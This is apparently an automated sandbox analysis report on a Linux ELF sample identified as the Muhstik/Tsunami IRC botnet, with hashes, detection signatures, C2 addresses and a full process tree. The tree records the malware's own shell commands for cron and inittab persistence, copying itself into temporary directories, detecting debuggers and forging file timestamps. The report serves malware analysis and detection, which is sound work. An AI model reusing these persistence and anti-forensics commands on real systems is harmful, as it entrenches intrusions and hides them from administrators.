Play interactive tour

Edit tour

Linux Analysis Report pty3

Overview

General Information

Sample Name:	pty3
Analysis ID:	544445
MD5:	fdd5532c5ec4d3238d2fd36b0a0b187f
SHA1:	0e281fa38dcd1c3db0f9059991a351ad4d67238d
SHA256:	c01fa3e23232da79e1ee1e722050ab8ac09b90bfebbf93a440bc1316ef7a127c
Tags:	elflog4j
Infos:

Detection

Muhstik Tsunami

Score:	96
Range:	0 - 100
Whitelisted:	false

Signatures

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Yara detected Muhstik

Multi AV Scanner detection for submitted file

Yara detected Tsunami

Uses IRC for communication with a C&C

Writes identical ELF files to multiple locations

Sample tries to persist itself using cron

Explicitly modifies time stamps using the "touch" command

Executes the "crontab" command typically for achieving persistence

Uses known network protocols on non-standard ports

Sample contains only a LOAD segment without any section mappings

Writes ELF files to disk

Executes the "grep" command used to find patterns in files or piped streams

Uses the "uname" system call to query kernel version information (possible evasion)

Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)

Detected TCP or UDP traffic on non-standard ports

Sample listens on a socket

Writes crontab like entries to files to /var or /etc typically for achieving persistence

Tries to resolve domain names, but no domain seems valid (expired dropper behavior)

Executes commands using a shell command-line interpreter

Executes the "rm" command used to delete files or directories

Executes the "touch" command used to create files or modify time stamps

Classification

Analysis Advice

All HTTP servers contacted by the sample do not answer. Likely the sample is an old dropper which does no longer work

All domains contacted by the sample do not resolve. Likely the sample is an old dropper which does no longer work

General Information

Joe Sandbox Version:	34.0.0 Boulder Opal
Analysis ID:	544445
Start date:	23.12.2021
Start time:	11:30:34
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 5m 57s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	pty3
Cookbook file name:	defaultlinuxfilecookbook.jbs
Analysis system description:	Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:	default
Detection:	MAL
Classification:	mal96.troj.evad.lin@0/23@14/0
Warnings:	Show All VT rate limit hit for: /run/pty3

Process Tree

system is lnxubuntu20

pty3 (PID: 5223, Parent: 5118, MD5: fdd5532c5ec4d3238d2fd36b0a0b187f) Arguments: /tmp/pty3

pty3 New Fork (PID: 5224, Parent: 5223)

sh (PID: 5224, Parent: 5223, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "pidof -x strace > /dev/null"

sh New Fork (PID: 5225, Parent: 5224)

pidof (PID: 5225, Parent: 5224, MD5: f58f67968fc50f1497f9ea9e9c22b6e8) Arguments: pidof -x strace

pty3 New Fork (PID: 5226, Parent: 5223)

sh (PID: 5226, Parent: 5223, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "pidof -x tcpdump > /dev/null"

sh New Fork (PID: 5227, Parent: 5226)

pidof (PID: 5227, Parent: 5226, MD5: f58f67968fc50f1497f9ea9e9c22b6e8) Arguments: pidof -x tcpdump

pty3 New Fork (PID: 5230, Parent: 5223)

pty3 New Fork (PID: 5232, Parent: 5230)

sh (PID: 5232, Parent: 5230, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "crontab -r"

sh New Fork (PID: 5235, Parent: 5232)

crontab (PID: 5235, Parent: 5232, MD5: 66e521d421ac9b407699061bf21806f5) Arguments: crontab -r

pty3 New Fork (PID: 5231, Parent: 5223)

pty3 New Fork (PID: 5234, Parent: 5231)

sh (PID: 5234, Parent: 5231, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "crontab -l | grep /tmp/pty3 | grep -v \"no cron\" || (crontab -l ; echo \"* * * * * /tmp/pty3 > /dev/null 2>&1 &\") | crontab -"

sh New Fork (PID: 5238, Parent: 5234)

crontab (PID: 5238, Parent: 5234, MD5: 66e521d421ac9b407699061bf21806f5) Arguments: crontab -l

sh New Fork (PID: 5239, Parent: 5234)

grep (PID: 5239, Parent: 5234, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep /tmp/pty3

sh New Fork (PID: 5240, Parent: 5234)

grep (PID: 5240, Parent: 5234, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -v "no cron"

sh New Fork (PID: 5242, Parent: 5234)

sh New Fork (PID: 5244, Parent: 5242)

crontab (PID: 5244, Parent: 5242, MD5: 66e521d421ac9b407699061bf21806f5) Arguments: crontab -l

sh New Fork (PID: 5243, Parent: 5234)

crontab (PID: 5243, Parent: 5234, MD5: 66e521d421ac9b407699061bf21806f5) Arguments: crontab -

pty3 New Fork (PID: 5233, Parent: 5223)

sh (PID: 5233, Parent: 5223, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "cat /etc/inittab | grep -v \"/tmp/pty3\" > /etc/inittab2"

sh New Fork (PID: 5236, Parent: 5233)

cat (PID: 5236, Parent: 5233, MD5: 7e9d213e404ad3bb82e4ebb2e1f2c1b3) Arguments: cat /etc/inittab

sh New Fork (PID: 5237, Parent: 5233)

grep (PID: 5237, Parent: 5233, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -v /tmp/pty3

pty3 New Fork (PID: 5241, Parent: 5223)

sh (PID: 5241, Parent: 5223, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "echo \"0:2345:respawn:/tmp/pty3\" >> /etc/inittab2"

pty3 New Fork (PID: 5245, Parent: 5223)

sh (PID: 5245, Parent: 5223, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "cat /etc/inittab2 > /etc/inittab"

sh New Fork (PID: 5246, Parent: 5245)

cat (PID: 5246, Parent: 5245, MD5: 7e9d213e404ad3bb82e4ebb2e1f2c1b3) Arguments: cat /etc/inittab2

pty3 New Fork (PID: 5247, Parent: 5223)

sh (PID: 5247, Parent: 5223, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "rm -rf /etc/inittab2"

sh New Fork (PID: 5248, Parent: 5247)

rm (PID: 5248, Parent: 5247, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -rf /etc/inittab2

pty3 New Fork (PID: 5249, Parent: 5223)

sh (PID: 5249, Parent: 5223, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "touch -acmr /bin/ls /etc/inittab"

sh New Fork (PID: 5250, Parent: 5249)

touch (PID: 5250, Parent: 5249, MD5: 3859c173f5d3b37be3e531b7c84a9c68) Arguments: touch -acmr /bin/ls /etc/inittab

pty3 New Fork (PID: 5251, Parent: 5223)

pty3 New Fork (PID: 5252, Parent: 5251)

sh (PID: 5252, Parent: 5251, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "cp -f /tmp/pty3 /dev/shm/pty3"

sh New Fork (PID: 5255, Parent: 5252)

cp (PID: 5255, Parent: 5252, MD5: 40f10ae7ea3e44218d1a8c306f79c83f) Arguments: cp -f /tmp/pty3 /dev/shm/pty3

pty3 New Fork (PID: 5257, Parent: 5251)

pty3 New Fork (PID: 5259, Parent: 5257)

sh (PID: 5259, Parent: 5257, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "crontab -l | grep /dev/shm/pty3 | grep -v \"no cron\" || (crontab -l ; echo \"* * * * * /dev/shm/pty3 > /dev/null 2>&1 &\") | crontab -"

sh New Fork (PID: 5262, Parent: 5259)

crontab (PID: 5262, Parent: 5259, MD5: 66e521d421ac9b407699061bf21806f5) Arguments: crontab -l

sh New Fork (PID: 5263, Parent: 5259)

grep (PID: 5263, Parent: 5259, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep /dev/shm/pty3

sh New Fork (PID: 5264, Parent: 5259)

grep (PID: 5264, Parent: 5259, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -v "no cron"

sh New Fork (PID: 5266, Parent: 5259)

sh New Fork (PID: 5268, Parent: 5266)

crontab (PID: 5268, Parent: 5266, MD5: 66e521d421ac9b407699061bf21806f5) Arguments: crontab -l

sh New Fork (PID: 5267, Parent: 5259)

crontab (PID: 5267, Parent: 5259, MD5: 66e521d421ac9b407699061bf21806f5) Arguments: crontab -

pty3 New Fork (PID: 5258, Parent: 5251)

sh (PID: 5258, Parent: 5251, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "cat /etc/inittab | grep -v \"/dev/shm/pty3\" > /etc/inittab2"

sh New Fork (PID: 5260, Parent: 5258)

cat (PID: 5260, Parent: 5258, MD5: 7e9d213e404ad3bb82e4ebb2e1f2c1b3) Arguments: cat /etc/inittab

sh New Fork (PID: 5261, Parent: 5258)

grep (PID: 5261, Parent: 5258, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -v /dev/shm/pty3

pty3 New Fork (PID: 5265, Parent: 5251)

sh (PID: 5265, Parent: 5251, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "echo \"0:2345:respawn:/dev/shm/pty3\" >> /etc/inittab2"

pty3 New Fork (PID: 5269, Parent: 5251)

sh (PID: 5269, Parent: 5251, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "cat /etc/inittab2 > /etc/inittab"

sh New Fork (PID: 5270, Parent: 5269)

cat (PID: 5270, Parent: 5269, MD5: 7e9d213e404ad3bb82e4ebb2e1f2c1b3) Arguments: cat /etc/inittab2

pty3 New Fork (PID: 5271, Parent: 5251)

sh (PID: 5271, Parent: 5251, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "rm -rf /etc/inittab2"

sh New Fork (PID: 5272, Parent: 5271)

rm (PID: 5272, Parent: 5271, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -rf /etc/inittab2

pty3 New Fork (PID: 5273, Parent: 5251)

sh (PID: 5273, Parent: 5251, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "touch -acmr /bin/ls /etc/inittab"

sh New Fork (PID: 5274, Parent: 5273)

touch (PID: 5274, Parent: 5273, MD5: 3859c173f5d3b37be3e531b7c84a9c68) Arguments: touch -acmr /bin/ls /etc/inittab

pty3 New Fork (PID: 5275, Parent: 5251)

sh (PID: 5275, Parent: 5251, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "cp -f /tmp/pty3 /var/tmp/pty3"

sh New Fork (PID: 5276, Parent: 5275)

cp (PID: 5276, Parent: 5275, MD5: 40f10ae7ea3e44218d1a8c306f79c83f) Arguments: cp -f /tmp/pty3 /var/tmp/pty3

pty3 New Fork (PID: 5277, Parent: 5251)

pty3 New Fork (PID: 5279, Parent: 5277)

sh (PID: 5279, Parent: 5277, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "crontab -l | grep /var/tmp/pty3 | grep -v \"no cron\" || (crontab -l ; echo \"* * * * * /var/tmp/pty3 > /dev/null 2>&1 &\") | crontab -"

sh New Fork (PID: 5282, Parent: 5279)

crontab (PID: 5282, Parent: 5279, MD5: 66e521d421ac9b407699061bf21806f5) Arguments: crontab -l

sh New Fork (PID: 5283, Parent: 5279)

grep (PID: 5283, Parent: 5279, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep /var/tmp/pty3

sh New Fork (PID: 5284, Parent: 5279)

grep (PID: 5284, Parent: 5279, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -v "no cron"

sh New Fork (PID: 5288, Parent: 5279)

sh New Fork (PID: 5290, Parent: 5288)

crontab (PID: 5290, Parent: 5288, MD5: 66e521d421ac9b407699061bf21806f5) Arguments: crontab -l

sh New Fork (PID: 5289, Parent: 5279)

crontab (PID: 5289, Parent: 5279, MD5: 66e521d421ac9b407699061bf21806f5) Arguments: crontab -

pty3 New Fork (PID: 5278, Parent: 5251)

sh (PID: 5278, Parent: 5251, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "cat /etc/inittab | grep -v \"/var/tmp/pty3\" > /etc/inittab2"

sh New Fork (PID: 5280, Parent: 5278)

cat (PID: 5280, Parent: 5278, MD5: 7e9d213e404ad3bb82e4ebb2e1f2c1b3) Arguments: cat /etc/inittab

sh New Fork (PID: 5281, Parent: 5278)

grep (PID: 5281, Parent: 5278, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -v /var/tmp/pty3

pty3 New Fork (PID: 5287, Parent: 5251)

sh (PID: 5287, Parent: 5251, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "echo \"0:2345:respawn:/var/tmp/pty3\" >> /etc/inittab2"

pty3 New Fork (PID: 5291, Parent: 5251)

sh (PID: 5291, Parent: 5251, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "cat /etc/inittab2 > /etc/inittab"

sh New Fork (PID: 5292, Parent: 5291)

cat (PID: 5292, Parent: 5291, MD5: 7e9d213e404ad3bb82e4ebb2e1f2c1b3) Arguments: cat /etc/inittab2

pty3 New Fork (PID: 5293, Parent: 5251)

sh (PID: 5293, Parent: 5251, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "rm -rf /etc/inittab2"

sh New Fork (PID: 5294, Parent: 5293)

rm (PID: 5294, Parent: 5293, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -rf /etc/inittab2

pty3 New Fork (PID: 5295, Parent: 5251)

sh (PID: 5295, Parent: 5251, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "touch -acmr /bin/ls /etc/inittab"

sh New Fork (PID: 5296, Parent: 5295)

touch (PID: 5296, Parent: 5295, MD5: 3859c173f5d3b37be3e531b7c84a9c68) Arguments: touch -acmr /bin/ls /etc/inittab

pty3 New Fork (PID: 5297, Parent: 5251)

sh (PID: 5297, Parent: 5251, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "cp -f /tmp/pty3 /var/lock/pty3"

sh New Fork (PID: 5298, Parent: 5297)

cp (PID: 5298, Parent: 5297, MD5: 40f10ae7ea3e44218d1a8c306f79c83f) Arguments: cp -f /tmp/pty3 /var/lock/pty3

pty3 New Fork (PID: 5299, Parent: 5251)

pty3 New Fork (PID: 5301, Parent: 5299)

sh (PID: 5301, Parent: 5299, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "crontab -l | grep /var/lock/pty3 | grep -v \"no cron\" || (crontab -l ; echo \"* * * * * /var/lock/pty3 > /dev/null 2>&1 &\") | crontab -"

sh New Fork (PID: 5304, Parent: 5301)

crontab (PID: 5304, Parent: 5301, MD5: 66e521d421ac9b407699061bf21806f5) Arguments: crontab -l

sh New Fork (PID: 5305, Parent: 5301)

grep (PID: 5305, Parent: 5301, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep /var/lock/pty3

sh New Fork (PID: 5306, Parent: 5301)

grep (PID: 5306, Parent: 5301, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -v "no cron"

sh New Fork (PID: 5307, Parent: 5301)

sh New Fork (PID: 5309, Parent: 5307)

crontab (PID: 5309, Parent: 5307, MD5: 66e521d421ac9b407699061bf21806f5) Arguments: crontab -l

sh New Fork (PID: 5308, Parent: 5301)

crontab (PID: 5308, Parent: 5301, MD5: 66e521d421ac9b407699061bf21806f5) Arguments: crontab -

pty3 New Fork (PID: 5300, Parent: 5251)

sh (PID: 5300, Parent: 5251, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "cat /etc/inittab | grep -v \"/var/lock/pty3\" > /etc/inittab2"

sh New Fork (PID: 5302, Parent: 5300)

cat (PID: 5302, Parent: 5300, MD5: 7e9d213e404ad3bb82e4ebb2e1f2c1b3) Arguments: cat /etc/inittab

sh New Fork (PID: 5303, Parent: 5300)

grep (PID: 5303, Parent: 5300, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -v /var/lock/pty3

pty3 New Fork (PID: 5310, Parent: 5251)

sh (PID: 5310, Parent: 5251, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "echo \"0:2345:respawn:/var/lock/pty3\" >> /etc/inittab2"

pty3 New Fork (PID: 5311, Parent: 5251)

sh (PID: 5311, Parent: 5251, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "cat /etc/inittab2 > /etc/inittab"

sh New Fork (PID: 5312, Parent: 5311)

cat (PID: 5312, Parent: 5311, MD5: 7e9d213e404ad3bb82e4ebb2e1f2c1b3) Arguments: cat /etc/inittab2

pty3 New Fork (PID: 5313, Parent: 5251)

sh (PID: 5313, Parent: 5251, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "rm -rf /etc/inittab2"

sh New Fork (PID: 5314, Parent: 5313)

rm (PID: 5314, Parent: 5313, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -rf /etc/inittab2

pty3 New Fork (PID: 5315, Parent: 5251)

sh (PID: 5315, Parent: 5251, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "touch -acmr /bin/ls /etc/inittab"

sh New Fork (PID: 5316, Parent: 5315)

touch (PID: 5316, Parent: 5315, MD5: 3859c173f5d3b37be3e531b7c84a9c68) Arguments: touch -acmr /bin/ls /etc/inittab

pty3 New Fork (PID: 5317, Parent: 5251)

sh (PID: 5317, Parent: 5251, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "cp -f /tmp/pty3 /var/run/pty3"

sh New Fork (PID: 5318, Parent: 5317)

cp (PID: 5318, Parent: 5317, MD5: 40f10ae7ea3e44218d1a8c306f79c83f) Arguments: cp -f /tmp/pty3 /var/run/pty3

pty3 New Fork (PID: 5319, Parent: 5251)

pty3 New Fork (PID: 5321, Parent: 5319)

sh (PID: 5321, Parent: 5319, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "crontab -l | grep /var/run/pty3 | grep -v \"no cron\" || (crontab -l ; echo \"* * * * * /var/run/pty3 > /dev/null 2>&1 &\") | crontab -"

sh New Fork (PID: 5324, Parent: 5321)

crontab (PID: 5324, Parent: 5321, MD5: 66e521d421ac9b407699061bf21806f5) Arguments: crontab -l

sh New Fork (PID: 5325, Parent: 5321)

grep (PID: 5325, Parent: 5321, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep /var/run/pty3

sh New Fork (PID: 5326, Parent: 5321)

grep (PID: 5326, Parent: 5321, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -v "no cron"

sh New Fork (PID: 5328, Parent: 5321)

sh New Fork (PID: 5331, Parent: 5328)

crontab (PID: 5331, Parent: 5328, MD5: 66e521d421ac9b407699061bf21806f5) Arguments: crontab -l

sh New Fork (PID: 5330, Parent: 5321)

crontab (PID: 5330, Parent: 5321, MD5: 66e521d421ac9b407699061bf21806f5) Arguments: crontab -

pty3 New Fork (PID: 5320, Parent: 5251)

sh (PID: 5320, Parent: 5251, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "cat /etc/inittab | grep -v \"/var/run/pty3\" > /etc/inittab2"

sh New Fork (PID: 5322, Parent: 5320)

cat (PID: 5322, Parent: 5320, MD5: 7e9d213e404ad3bb82e4ebb2e1f2c1b3) Arguments: cat /etc/inittab

sh New Fork (PID: 5323, Parent: 5320)

grep (PID: 5323, Parent: 5320, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -v /var/run/pty3

pty3 New Fork (PID: 5327, Parent: 5251)

sh (PID: 5327, Parent: 5251, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "echo \"0:2345:respawn:/var/run/pty3\" >> /etc/inittab2"

pty3 New Fork (PID: 5329, Parent: 5251)

sh (PID: 5329, Parent: 5251, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "cat /etc/inittab2 > /etc/inittab"

sh New Fork (PID: 5332, Parent: 5329)

cat (PID: 5332, Parent: 5329, MD5: 7e9d213e404ad3bb82e4ebb2e1f2c1b3) Arguments: cat /etc/inittab2

pty3 New Fork (PID: 5333, Parent: 5251)

sh (PID: 5333, Parent: 5251, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "rm -rf /etc/inittab2"

sh New Fork (PID: 5334, Parent: 5333)

rm (PID: 5334, Parent: 5333, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -rf /etc/inittab2

pty3 New Fork (PID: 5335, Parent: 5251)

sh (PID: 5335, Parent: 5251, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "touch -acmr /bin/ls /etc/inittab"

sh New Fork (PID: 5336, Parent: 5335)

touch (PID: 5336, Parent: 5335, MD5: 3859c173f5d3b37be3e531b7c84a9c68) Arguments: touch -acmr /bin/ls /etc/inittab

pty3 New Fork (PID: 5253, Parent: 5223)

pty3 New Fork (PID: 5254, Parent: 5253)

sh (PID: 5254, Parent: 5253, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "/bin/uname -n"

sh New Fork (PID: 5256, Parent: 5254)

uname (PID: 5256, Parent: 5254, MD5: 4ac7c634c5bec95753c480e9d421dcc2) Arguments: /bin/uname -n

cleanup

Yara Overview

Memory Dumps

Source	Rule	Description	Author
5251.1.00000000a0bbd638.00000000f9d79001.r-x.sdmp	JoeSecurity_Tsunami	Yara detected Tsunami	Joe Security
5251.1.00000000a0bbd638.00000000f9d79001.r-x.sdmp	JoeSecurity_Muhstik	Yara detected Muhstik	Joe Security
5257.1.00000000a0bbd638.00000000f9d79001.r-x.sdmp	JoeSecurity_Tsunami	Yara detected Tsunami	Joe Security
5257.1.00000000a0bbd638.00000000f9d79001.r-x.sdmp	JoeSecurity_Muhstik	Yara detected Muhstik	Joe Security
5277.1.00000000a0bbd638.00000000f9d79001.r-x.sdmp	JoeSecurity_Tsunami	Yara detected Tsunami	Joe Security
5277.1.00000000a0bbd638.00000000f9d79001.r-x.sdmp	JoeSecurity_Muhstik	Yara detected Muhstik	Joe Security
5231.1.00000000a0bbd638.00000000f9d79001.r-x.sdmp	JoeSecurity_Tsunami	Yara detected Tsunami	Joe Security
5231.1.00000000a0bbd638.00000000f9d79001.r-x.sdmp	JoeSecurity_Muhstik	Yara detected Muhstik	Joe Security
5319.1.00000000a0bbd638.00000000f9d79001.r-x.sdmp	JoeSecurity_Tsunami	Yara detected Tsunami	Joe Security
5319.1.00000000a0bbd638.00000000f9d79001.r-x.sdmp	JoeSecurity_Muhstik	Yara detected Muhstik	Joe Security
5223.1.00000000a0bbd638.00000000f9d79001.r-x.sdmp	JoeSecurity_Tsunami	Yara detected Tsunami	Joe Security
5223.1.00000000a0bbd638.00000000f9d79001.r-x.sdmp	JoeSecurity_Muhstik	Yara detected Muhstik	Joe Security
5299.1.00000000a0bbd638.00000000f9d79001.r-x.sdmp	JoeSecurity_Tsunami	Yara detected Tsunami	Joe Security
5299.1.00000000a0bbd638.00000000f9d79001.r-x.sdmp	JoeSecurity_Muhstik	Yara detected Muhstik	Joe Security
5230.1.00000000a0bbd638.00000000f9d79001.r-x.sdmp	JoeSecurity_Tsunami	Yara detected Tsunami	Joe Security
5230.1.00000000a0bbd638.00000000f9d79001.r-x.sdmp	JoeSecurity_Muhstik	Yara detected Muhstik	Joe Security
Process Memory Space: pty3 PID: 5223	JoeSecurity_Tsunami	Yara detected Tsunami	Joe Security
Process Memory Space: pty3 PID: 5230	JoeSecurity_Tsunami	Yara detected Tsunami	Joe Security
Process Memory Space: pty3 PID: 5231	JoeSecurity_Tsunami	Yara detected Tsunami	Joe Security
Process Memory Space: pty3 PID: 5251	JoeSecurity_Tsunami	Yara detected Tsunami	Joe Security
Process Memory Space: pty3 PID: 5257	JoeSecurity_Tsunami	Yara detected Tsunami	Joe Security
Process Memory Space: pty3 PID: 5277	JoeSecurity_Tsunami	Yara detected Tsunami	Joe Security
Process Memory Space: pty3 PID: 5299	JoeSecurity_Tsunami	Yara detected Tsunami	Joe Security
Process Memory Space: pty3 PID: 5319	JoeSecurity_Tsunami	Yara detected Tsunami	Joe Security
Click to see the 19 entries

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Multi AV Scanner detection for submitted file

Show sources

Source: pty3	Virustotal: Detection: 42%			Perma Link
Source: pty3	ReversingLabs: Detection: 51%

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Show sources

Source: Traffic

Snort IDS: 2034743 ET TROJAN ELF/Muhstik Botnet CnC Activity 192.168.2.23:48714 -> 156.67.220.165:8080

Uses IRC for communication with a C&C

Show sources

Source: unknown

IRC traffic detected: 192.168.2.23:48714 -> 156.67.220.165:8080 NICK x86|LOG|i|0|10263889|galassia USER x01 localhost localhost :muhstik-11052018

Uses known network protocols on non-standard ports

Show sources

Source: unknown	Network traffic detected: IRC traffic on port 48714 -> 8080
Source: unknown	Network traffic detected: IRC traffic on port 48714 -> 8080

Source: global traffic	TCP traffic: 192.168.2.23:42836 -> 91.189.91.43:443
Source: global traffic	TCP traffic: 192.168.2.23:42516 -> 109.202.202.202:80
Source: global traffic	TCP traffic: 192.168.2.23:43928 -> 91.189.91.42:443

Source: global traffic	TCP traffic: 192.168.2.23:57024 -> 45.132.241.68:8080
Source: global traffic	TCP traffic: 192.168.2.23:48714 -> 156.67.220.165:8080

Source: /tmp/pty3 (PID: 5223)

Socket: 127.0.0.1::59000

Jump to behavior

Source: unknown

DNS traffic detected: query: l.deutschland-zahlung.net replaycode: Name error (3)

Source: unknown	Network traffic detected: HTTP traffic on port 43928 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 42836 -> 443

Source: unknown	TCP traffic detected without corresponding DNS query: 91.189.91.43
Source: unknown	TCP traffic detected without corresponding DNS query: 109.202.202.202
Source: unknown	TCP traffic detected without corresponding DNS query: 45.132.241.68
Source: unknown	TCP traffic detected without corresponding DNS query: 156.67.220.165
Source: unknown	TCP traffic detected without corresponding DNS query: 156.67.220.165
Source: unknown	TCP traffic detected without corresponding DNS query: 156.67.220.165
Source: unknown	TCP traffic detected without corresponding DNS query: 156.67.220.165
Source: unknown	TCP traffic detected without corresponding DNS query: 156.67.220.165
Source: unknown	TCP traffic detected without corresponding DNS query: 156.67.220.165
Source: unknown	TCP traffic detected without corresponding DNS query: 156.67.220.165
Source: unknown	TCP traffic detected without corresponding DNS query: 156.67.220.165
Source: unknown	TCP traffic detected without corresponding DNS query: 156.67.220.165
Source: unknown	TCP traffic detected without corresponding DNS query: 156.67.220.165
Source: unknown	TCP traffic detected without corresponding DNS query: 156.67.220.165
Source: unknown	TCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknown	TCP traffic detected without corresponding DNS query: 91.189.91.43
Source: unknown	TCP traffic detected without corresponding DNS query: 109.202.202.202
Source: unknown	TCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: unknown

DNS traffic detected: queries for: l.deutschland-zahlung.net

Source: LOAD without section mappings

Program segment: 0x100000

Source: classification engine

Classification label: mal96.troj.evad.lin@0/23@14/0

Persistence and Installation Behavior:

Writes identical ELF files to multiple locations

Show sources

Source: /usr/bin/cp (PID: 5298)	File with SHA-256 C01FA3E23232DA79E1EE1E722050AB8AC09B90BFEBBF93A440BC1316EF7A127C written: /run/lock/pty3	Jump to dropped file
Source: /usr/bin/cp (PID: 5255)	File with SHA-256 C01FA3E23232DA79E1EE1E722050AB8AC09B90BFEBBF93A440BC1316EF7A127C written: /dev/shm/pty3	Jump to dropped file
Source: /usr/bin/cp (PID: 5276)	File with SHA-256 C01FA3E23232DA79E1EE1E722050AB8AC09B90BFEBBF93A440BC1316EF7A127C written: /var/tmp/pty3	Jump to dropped file
Source: /usr/bin/cp (PID: 5318)	File with SHA-256 C01FA3E23232DA79E1EE1E722050AB8AC09B90BFEBBF93A440BC1316EF7A127C written: /run/pty3	Jump to dropped file

Sample tries to persist itself using cron

Show sources

Source: /usr/bin/crontab (PID: 5243)	File: /var/spool/cron/crontabs/tmp.001wAF	Jump to behavior
Source: /usr/bin/crontab (PID: 5243)	File: /var/spool/cron/crontabs/root	Jump to behavior
Source: /usr/bin/crontab (PID: 5267)	File: /var/spool/cron/crontabs/tmp.FFzEXt	Jump to behavior
Source: /usr/bin/crontab (PID: 5267)	File: /var/spool/cron/crontabs/root	Jump to behavior
Source: /usr/bin/crontab (PID: 5289)	File: /var/spool/cron/crontabs/tmp.7EMzq6	Jump to behavior
Source: /usr/bin/crontab (PID: 5289)	File: /var/spool/cron/crontabs/root	Jump to behavior
Source: /usr/bin/crontab (PID: 5308)	File: /var/spool/cron/crontabs/tmp.2HVWUA	Jump to behavior
